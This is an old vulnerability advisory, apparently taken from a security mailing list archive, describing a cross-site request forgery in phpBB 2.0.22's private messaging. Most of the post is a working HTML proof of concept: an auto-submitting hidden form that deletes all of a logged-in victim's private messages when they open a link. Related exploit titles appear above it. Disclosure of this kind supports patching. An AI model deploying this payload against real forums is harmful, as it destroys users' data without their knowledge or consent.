Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[CandyPress] eCommerce suite (SQL Injection + XSS + Path Disclosure)

Pre Dynamic Institution bypass

Pre Hotel and Resorts reservation portal login bypass

E-SMART CART bypass

From:	nbbn_(at)_gmx.net <nbbn_(at)_gmx.net>
Date:	25.01.2008
Subject:	phpBB 2.0.22 Remote PM Delete XSRF Vulnerability

################################################################
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability               
by NBBN                        Type: Cross-Site Request Forgery
Founded: December 2007                                         
################################################################


An attacker can send a link via pm to a site with the follow html code to a
victim and all victim's pm's are going to be deleted when he click the link.
######Code##########################################################

<html>
 <head>
 </head>
 <body onLoad=javascript:document.xsrf.submit()>

<form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post"
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">

</body>
</html>
#####################################################################


######Vuln Versions:#####################

I've tested it only on 2.0.22 but I think that all versions of 2 are vuln.




(Sorry my bad english :-) )